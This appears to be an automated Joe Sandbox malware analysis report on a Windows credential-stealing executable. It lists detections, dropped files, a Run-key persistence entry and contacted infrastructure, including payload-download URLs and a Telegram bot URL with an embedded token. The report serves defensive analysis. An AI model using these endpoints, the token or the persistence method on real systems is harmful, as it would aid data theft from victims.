Domain Accounts	Command and Scripting Interpreter2	Logon Script (Windows)	Registry Run Keys / Startup Folder1	Obfuscated Files or Information41	Security Account Manager	File and Directory Discovery3	SMB/Windows Admin Shares	Email Collection1	Automated Exfiltration	Ingress Tool Transfer12	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Software Packing14	NTDS	System Information Discovery168	Distributed Component Object Model	Input Capture1	Scheduled Transfer	Encrypted Channel21	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Timestomp1	LSA Secrets	Security Software Discovery481	SSH	Clipboard Data1	Data Transfer Size Limits	Non-Application Layer Protocol3	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	DLL Side-Loading1	Cached Domain Credentials	Virtualization/Sandbox Evasion251	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Application Layer Protocol114	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Masquerading1	DCSync	Process Discovery13	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Virtualization/Sandbox Evasion251	Proc Filesystem	System Owner/User Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Process Injection12	/etc/passwd and /etc/shadow	Remote System Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Hidden Files and Directories1	Network Sniffing	System Network Configuration Discovery1	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe	71%	Virustotal		Browse
18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe	31%	Metadefender		Browse
18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe	74%	ReversingLabs	ByteCode-MSIL.Spyware.AveMaria
18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe	100%	Avira	HEUR/AGEN.1142297
18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\AnonFileApi.dll	100%	Avira	TR/Agent.pyynm
C:\Users\user\AppData\Local\Temp\dll.exe	100%	Avira	TR/ATRAPS.Gen
C:\ProgramData\AMD Driver\taskshell.exe	100%	Avira	HEUR/AGEN.1124739
C:\Users\user\AppData\Local\Temp\chormuimii.exe	100%	Avira	TR/Dropper.MSIL.Gen
C:\Users\user\AppData\Local\Temp\chormuim.exe	100%	Avira	HEUR/AGEN.1209556
C:\Users\user\AppData\Local\Temp\svchoste.exe	100%	Avira	TR/AD.Chapak.dvwuj
C:\Users\user\AppData\Local\Temp\AnonFileApi.dll	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\dll.exe	100%	Joe Sandbox ML
C:\ProgramData\AMD Driver\taskshell.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\chormuimii.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\chormuim.exe	100%	Joe Sandbox ML
C:\ProgramData\AMD Driver\taskshell.exe	40%	Metadefender		Browse
C:\ProgramData\AMD Driver\taskshell.exe	75%	ReversingLabs	ByteCode-MSIL.Trojan.ClipBanker
C:\ProgramData\freebl3.dll	0%	Metadefender		Browse
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	3%	Metadefender		Browse
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	Metadefender		Browse
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	Metadefender		Browse
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	Metadefender		Browse
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\sqlite3.dll	3%	Metadefender		Browse
C:\ProgramData\sqlite3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	Metadefender		Browse
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\AnonFileApi.dll	44%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\AnonFileApi.dll	75%	ReversingLabs	ByteCode-MSIL.Trojan.Perseus

Unpacked PE Files

Source	Detection	Scanner	Label	Download
8.2.chormuim.exe.280000.0.unpack	100%	Avira	HEUR/AGEN.1140075	Download File
5.2.dll.exe.10000.0.unpack	100%	Avira	TR/ATRAPS.Gen	Download File
12.0.taskshell.exe.d90000.0.unpack	100%	Avira	HEUR/AGEN.1124739	Download File
8.0.chormuim.exe.280000.6.unpack	100%	Avira	HEUR/AGEN.1140075	Download File
4.0.svchoste.exe.b70000.0.unpack	100%	Avira	HEUR/AGEN.1136795	Download File
12.2.taskshell.exe.d90000.0.unpack	100%	Avira	HEUR/AGEN.1124739	Download File
6.0.chormuimii.exe.400000.0.unpack	100%	Avira	TR/Dropper.MSIL.Gen	Download File
6.2.chormuimii.exe.4b5ec00.9.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
0.2.18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe.12cb1698.5.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
8.0.chormuim.exe.280000.3.unpack	100%	Avira	HEUR/AGEN.1140075	Download File
0.0.18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe.920000.0.unpack	100%	Avira	HEUR/AGEN.1142297	Download File
16.0.taskshell.exe.310000.0.unpack	100%	Avira	HEUR/AGEN.1124739	Download File
6.2.chormuimii.exe.2406b90.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
7.2.taskshell.exe.640000.0.unpack	100%	Avira	HEUR/AGEN.1124739	Download File
8.0.chormuim.exe.280000.0.unpack	100%	Avira	HEUR/AGEN.1140075	Download File
0.2.18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe.920000.0.unpack	100%	Avira	HEUR/AGEN.1142297	Download File
16.2.taskshell.exe.310000.0.unpack	100%	Avira	HEUR/AGEN.1124739	Download File
7.0.taskshell.exe.640000.0.unpack	100%	Avira	HEUR/AGEN.1124739	Download File
8.0.chormuim.exe.280000.2.unpack	100%	Avira	HEUR/AGEN.1140075	Download File
8.0.chormuim.exe.280000.1.unpack	100%	Avira	HEUR/AGEN.1140075	Download File
4.2.svchoste.exe.b70000.0.unpack	100%	Avira	HEUR/AGEN.1136795	Download File
5.0.dll.exe.10000.0.unpack	100%	Avira	TR/ATRAPS.Gen	Download File
6.2.chormuimii.exe.4c0fb62.11.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://pplonline.org/Cgi//2.jpg2	0%	Avira URL Cloud	safe
http://pplonline.org/Cgi//3.jpg	1%	Virustotal		Browse
http://pplonline.org/Cgi//3.jpg	0%	Avira URL Cloud	safe
http://www.mozilla.com0	0%	URL Reputation	safe
http://pplonline.org/Cgi//5.jpg	1%	Virustotal		Browse
http://pplonline.org/Cgi//5.jpg	0%	Avira URL Cloud	safe
https://raw.githubusercontent.com/caxmd/StormKitty/master/StormKitty/stub/packages/AnonFileApi.1.14.6/lib/net40/AnonFileApi.dll	100%	Avira URL Cloud	malware
http://pplonline.org/Cgi//4.jpg	0%	Avira URL Cloud	safe
http://pplonline.org/Cgi//main.php	0%	Avira URL Cloud	safe
http://pplonline.org/Cgi//1.jpg	0%	Avira URL Cloud	safe
http://pplonline.org/Cgi//2.jpg	0%	Avira URL Cloud	safe
http://crl.globals	0%	Avira URL Cloud	safe
http://ocsp.thawte.com0	0%	URL Reputation	safe
http://icanhazip.comx	0%	Avira URL Cloud	safe
aegismd.ca/cgi/	0%	Avira URL Cloud	safe
https://raw.githubusercontent.com/caxmd/StormKitty/master/StormKitty/stub/packages/DotNetZip.1.13.8/lib/net40/DotNetZip.dll	0%	Avira URL Cloud	safe
https://raw.githubusercontent.com/caxmd/StormKitty/master/StormKitty/stub/packages/DotNetZip.1.13.8/	0%	Avira URL Cloud	safe
http://ip-api.comx	0%	URL Reputation	safe
https://raw.githubusercontent.com/caxmd/StormKitty/master/StormKitty/stub/packages/AnonFileApi.1.14.	0%	Avira URL Cloud	safe
http://pplonline.org/Cgi//1.jpgU	0%	Avira URL Cloud	safe
https://api.telegram.orgx	0%	Avira URL Cloud	safe
https://raw.githubusercontent.com	0%	Avira URL Cloud	safe
http://pplonline.org/Cgi//7.jpg	0%	Avira URL Cloud	safe
https://api.tele	0%	Avira URL Cloud	safe
https://java.sun.com	0%	Avira URL Cloud	safe
https://api.telegrP	0%	Avira URL Cloud	safe
http://pplonline.org/Cgi/	0%	Avira URL Cloud	safe
http://ip-api.comV	0%	Avira URL Cloud	safe
http://pplonline.org/Cgi//6.jpg	0%	Avira URL Cloud	safe
http://pplonline.org/Cgi//3.jpgK	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
raw.githubusercontent.com	185.199.108.133	true	false	high
ip-api.com	208.95.112.1	true	false	high
pplonline.org	108.167.165.140	true	false	high
api.telegram.org	149.154.167.220	true	false	high
icanhazip.com	104.18.115.97	true	false	high
201.75.14.0.in-addr.arpa	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://pplonline.org/Cgi//3.jpg	true	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://pplonline.org/Cgi//5.jpg	true	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://icanhazip.com/	false		high
https://raw.githubusercontent.com/caxmd/StormKitty/master/StormKitty/stub/packages/AnonFileApi.1.14.6/lib/net40/AnonFileApi.dll	true	Avira URL Cloud: malware	unknown
http://pplonline.org/Cgi//4.jpg	true	Avira URL Cloud: safe	unknown
http://pplonline.org/Cgi//main.php	true	Avira URL Cloud: safe	unknown
http://pplonline.org/Cgi//1.jpg	true	Avira URL Cloud: safe	unknown
http://pplonline.org/Cgi//2.jpg	true	Avira URL Cloud: safe	unknown
aegismd.ca/cgi/	true	Avira URL Cloud: safe	low
https://raw.githubusercontent.com/caxmd/StormKitty/master/StormKitty/stub/packages/DotNetZip.1.13.8/lib/net40/DotNetZip.dll	true	Avira URL Cloud: safe	unknown
http://pplonline.org/Cgi//7.jpg	true	Avira URL Cloud: safe	unknown
http://pplonline.org/Cgi/	true	Avira URL Cloud: safe	unknown
http://pplonline.org/Cgi//6.jpg	true	Avira URL Cloud: safe	unknown
https://api.telegram.org/bot1456609378:AAEnBfmWHEJfWWOpiWK1aoQnqzDubVAn7J4/getMe	false		high
http://ip-api.com/line/?fields=hosting	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005	WerFault.exe, 0000001D.00000003.382485433.0000026D70BB0000.00000004.00000001.sdmp	false		high
https://duckduckgo.com/chrome_newtab	svchoste.exe, 00000004.00000003.318310238.0000000001366000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.371716058.0000000002C06000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000002.407794695.0000000002C06000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.370970662.0000000002982000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.356577085.0000000002982000.00000004.00000001.sdmp, tmp3B84.tmp.dat.8.dr, temp.4.dr, tmp7B6F.tmp.dat.8.dr	false		high
https://duckduckgo.com/ac/?q=	svchoste.exe, 00000004.00000003.318310238.0000000001366000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.371716058.0000000002C06000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000002.407794695.0000000002C06000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.370970662.0000000002982000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.356577085.0000000002982000.00000004.00000001.sdmp, tmp3B84.tmp.dat.8.dr, temp.4.dr, tmp7B6F.tmp.dat.8.dr	false		high
https://api.telegram.org	chormuim.exe, 00000008.00000000.371882143.0000000002C73000.00000004.00000001.sdmp	false		high
https://api.telegram.org/bot	chormuim.exe, 00000008.00000000.370391280.0000000002790000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.371765057.0000000002C35000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.356875831.0000000002AEF000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200	WerFault.exe, 0000001D.00000003.382485433.0000026D70BB0000.00000004.00000001.sdmp	false		high
http://pplonline.org/Cgi//2.jpg2	svchoste.exe, 00000004.00000002.329735600.00000000012BA000.00000004.00000020.sdmp	true	Avira URL Cloud: safe	unknown
https://support.google.com/chrome/answer/6258784	svchoste.exe, 00000004.00000002.330933696.0000000003820000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000002.407468863.0000000002B0D000.00000004.00000001.sdmp	false		high
http://www.mozilla.com0	svchoste.exe, 00000004.00000003.300385221.0000000003821000.00000004.00000001.sdmp, svchoste.exe, 00000004.00000003.304315459.0000000003821000.00000004.00000001.sdmp, svchoste.exe, 00000004.00000003.305330461.0000000003821000.00000004.00000001.sdmp, softokn3.dll.4.dr, nss3.dll.4.dr, freebl3.dll.4.dr, mozglue.dll.4.dr	true	URL Reputation: safe	unknown
http://icanhazip.com/8	chormuim.exe, 00000008.00000000.356408248.0000000002903000.00000004.00000001.sdmp	false		high
https://support.google.com/chrome/?p=plugin_flash	svchoste.exe, 00000004.00000002.330933696.0000000003820000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000002.407468863.0000000002B0D000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovince	WerFault.exe, 0000001D.00000003.382485433.0000026D70BB0000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20	WerFault.exe, 0000001D.00000003.382485433.0000026D70BB0000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authentication	WerFault.exe, 0000001D.00000003.382485433.0000026D70BB0000.00000004.00000001.sdmp	false		high
http://ip-api.com/line/?fields=h	chormuim.exe, 00000008.00000000.356697477.00000000029F7000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamejhttp://schemas.xmlsoap.o	WerFault.exe, 0000001D.00000003.382485433.0000026D70BB0000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid	WerFault.exe, 0000001D.00000003.382485433.0000026D70BB0000.00000004.00000001.sdmp	false		high
http://crl.thawte.com/ThawteTimestampingCA.crl0	svchoste.exe, 00000004.00000003.300385221.0000000003821000.00000004.00000001.sdmp, svchoste.exe, 00000004.00000003.304315459.0000000003821000.00000004.00000001.sdmp, svchoste.exe, 00000004.00000003.305330461.0000000003821000.00000004.00000001.sdmp, softokn3.dll.4.dr, nss3.dll.4.dr, freebl3.dll.4.dr, mozglue.dll.4.dr	false		high
https://github.com/LimerBoy/StormKitty	chormuim.exe.6.dr	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.o	WerFault.exe, 0000001D.00000003.382485433.0000026D70BB0000.00000004.00000001.sdmp	false		high
http://ip-api.com	chormuim.exe, 00000008.00000000.371044114.00000000029DD000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.356697477.00000000029F7000.00000004.00000001.sdmp	false		high
https://support.google.com/chrome/?p=plugin_divx	chormuim.exe, 00000008.00000002.407468863.0000000002B0D000.00000004.00000001.sdmp	false		high
http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_Sl	chormuim.exe, 00000008.00000002.407468863.0000000002B0D000.00000004.00000001.sdmp	false		high
http://icanhazip.com	chormuim.exe, 00000008.00000000.356408248.0000000002903000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000002.406912489.0000000002913000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	chormuim.exe, 00000008.00000000.370201907.0000000002691000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.355408259.0000000002691000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000002.406228414.0000000002691000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.382485433.0000026D70BB0000.00000004.00000001.sdmp	false		high
http://crl.globals	chormuim.exe, 00000008.00000000.373931616.000000001BA2C000.00000004.00000010.sdmp, chormuim.exe, 00000008.00000000.366204607.000000001BA2C000.00000004.00000010.sdmp	true	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier	WerFault.exe, 0000001D.00000003.382485433.0000026D70BB0000.00000004.00000001.sdmp	false		high
http://www.mozilla.com/en-US/blocklist/	mozglue.dll.4.dr	false		high
http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe	chormuim.exe, 00000008.00000002.407468863.0000000002B0D000.00000004.00000001.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	svchoste.exe, 00000004.00000003.318310238.0000000001366000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.371716058.0000000002C06000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000002.407794695.0000000002C06000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.370970662.0000000002982000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.356577085.0000000002982000.00000004.00000001.sdmp, tmp3B84.tmp.dat.8.dr, temp.4.dr, tmp7B6F.tmp.dat.8.dr	false		high
http://ocsp.thawte.com0	svchoste.exe, 00000004.00000003.300385221.0000000003821000.00000004.00000001.sdmp, svchoste.exe, 00000004.00000003.304315459.0000000003821000.00000004.00000001.sdmp, svchoste.exe, 00000004.00000003.305330461.0000000003821000.00000004.00000001.sdmp, softokn3.dll.4.dr, nss3.dll.4.dr, freebl3.dll.4.dr, mozglue.dll.4.dr	true	URL Reputation: safe	unknown
http://icanhazip.comx	chormuim.exe, 00000008.00000000.356408248.0000000002903000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphone	WerFault.exe, 0000001D.00000003.382485433.0000026D70BB0000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephone	WerFault.exe, 0000001D.00000003.382485433.0000026D70BB0000.00000004.00000001.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	svchoste.exe, 00000004.00000003.318310238.0000000001366000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.371716058.0000000002C06000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000002.407794695.0000000002C06000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.370970662.0000000002982000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.356577085.0000000002982000.00000004.00000001.sdmp, tmp3B84.tmp.dat.8.dr, temp.4.dr, tmp7B6F.tmp.dat.8.dr	false		high
http://upx.sf.net	Amcache.hve.29.dr	false		high
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search	svchoste.exe, 00000004.00000003.318310238.0000000001366000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.371716058.0000000002C06000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000002.407794695.0000000002C06000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.370970662.0000000002982000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.356577085.0000000002982000.00000004.00000001.sdmp, tmp3B84.tmp.dat.8.dr, temp.4.dr, tmp7B6F.tmp.dat.8.dr	false		high
https://raw.githubusercontent.com/caxmd/StormKitty/master/StormKitty/stub/packages/DotNetZip.1.13.8/	chormuim.exe, 00000008.00000002.406228414.0000000002691000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://ip-api.comx	chormuim.exe, 00000008.00000000.371044114.00000000029DD000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.356697477.00000000029F7000.00000004.00000001.sdmp	true	URL Reputation: safe	unknown
https://raw.githubusercontent.com/caxmd/StormKitty/master/StormKitty/stub/packages/AnonFileApi.1.14.	chormuim.exe, 00000008.00000002.406228414.0000000002691000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://pplonline.org/Cgi//1.jpgU	svchoste.exe, 00000004.00000002.329735600.00000000012BA000.00000004.00000020.sdmp	true	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcoderhttp://schemas.xmlsoap.org/ws/2005/	WerFault.exe, 0000001D.00000003.382485433.0000026D70BB0000.00000004.00000001.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	svchoste.exe, 00000004.00000003.318310238.0000000001366000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.371716058.0000000002C06000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000002.407794695.0000000002C06000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.370970662.0000000002982000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.356577085.0000000002982000.00000004.00000001.sdmp, tmp3B84.tmp.dat.8.dr, temp.4.dr, tmp7B6F.tmp.dat.8.dr	false		high
https://api.telegram.orgx	chormuim.exe, 00000008.00000000.370391280.0000000002790000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
https://raw.githubusercontent.com	chormuim.exe, 00000008.00000000.355699138.00000000026F3000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.370261870.00000000026F3000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
https://support.google.com/chrome/?p=plugin_shockwave	chormuim.exe, 00000008.00000002.407468863.0000000002B0D000.00000004.00000001.sdmp	false		high
https://api.tele	chormuim.exe, 00000008.00000000.356875831.0000000002AEF000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
https://java.sun.com	chormuim.exe, 00000008.00000002.408878521.000000001B711000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
https://api.telegrP	chormuim.exe, 00000008.00000000.371882143.0000000002C73000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://www.codeplex.com/DotNetZip	DotNetZip.dll.8.dr	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/	WerFault.exe, 0000001D.00000003.382485433.0000026D70BB0000.00000004.00000001.sdmp	false		high
http://api.telegram.org	chormuim.exe, 00000008.00000000.371882143.0000000002C73000.00000004.00000001.sdmp	false		high
http://ip-api.comV	chormuim.exe, 00000008.00000000.370201907.0000000002691000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.355408259.0000000002691000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000002.406228414.0000000002691000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	svchoste.exe, 00000004.00000003.318310238.0000000001366000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.371716058.0000000002C06000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000002.407794695.0000000002C06000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.370970662.0000000002982000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.356577085.0000000002982000.00000004.00000001.sdmp, tmp3B84.tmp.dat.8.dr, temp.4.dr, tmp7B6F.tmp.dat.8.dr	false		high
http://pplonline.org/Cgi//3.jpgK	svchoste.exe, 00000004.00000002.329735600.00000000012BA000.00000004.00000020.sdmp	true	Avira URL Cloud: safe	unknown
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	svchoste.exe, 00000004.00000003.318310238.0000000001366000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.371716058.0000000002C06000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000002.407794695.0000000002C06000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.370970662.0000000002982000.00000004.00000001.sdmp, chormuim.exe, 00000008.00000000.356577085.0000000002982000.00000004.00000001.sdmp, tmp3B84.tmp.dat.8.dr, temp.4.dr, tmp7B6F.tmp.dat.8.dr	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
108.167.165.140	pplonline.org	United States	46606	UNIFIEDLAYER-AS-1US	false
208.95.112.1	ip-api.com	United States	53334	TUT-ASUS	false
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
185.199.108.133	raw.githubusercontent.com	Netherlands	54113	FASTLYUS	false
104.18.115.97	icanhazip.com	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	553216
Start date:	14.01.2022
Start time:	13:48:20
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 14m 4s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	43
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@39/48@7/5
EGA Information:	Successful, ratio: 87.5%
HDC Information:	Successful, ratio: 7.8% (good quality ratio 7.4%) Quality average: 80.2% Quality standard deviation: 28.2%
HCA Information:	Successful, ratio: 54% Number of executed functions: 155 Number of non-executed functions: 62
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 23.211.5.146, 23.211.6.115, 52.182.143.212 Excluded domains from analysis (whitelisted): storeedgefd.dsx.mp.microsoft.com.edgekey.net.globalredir.akadns.net, store-images.s-microsoft.com-c.edgekey.net, storeedgefd.dsx.mp.microsoft.com.edgekey.net, arc.msn.com, storeedgefd.xbetservices.akadns.net, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, displaycatalog.mp.microsoft.com, e16646.dscg.akamaiedge.net, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, storeedgefd.dsx.mp.microsoft.com Execution Graph export aborted for target dll.exe, PID 5360 because it is empty Not all processes where analyzed, report is missing behavior information Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtOpenFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryAttributesFile calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtReadVirtualMemory calls found. Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
13:49:26	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run WMI Update Service C:\ProgramData\AMD Driver\taskshell.exe
13:49:34	API Interceptor	1x Sleep call for process: chormuim.exe modified
13:49:35	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run WMI Update Service C:\ProgramData\AMD Driver\taskshell.exe
13:50:05	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\ProgramData\216363876181815\_2163638761.zip Download File
Process:	C:\Users\user\AppData\Local\Temp\svchoste.exe
File Type:	Zip archive data, at least v2.0 to extract
Category:	dropped
Size (bytes):	91236
Entropy (8bit):	7.994761728240674
Encrypted:	true
SSDEEP:	1536:h/hvtb1ATOUvTzkROc03vVPgK6x9pXH6NcuJFS2ybU8gfhjhY33XTzKJg+TDKdF:Jhvt5UvT0IvVH67NozSetY33XT9RF
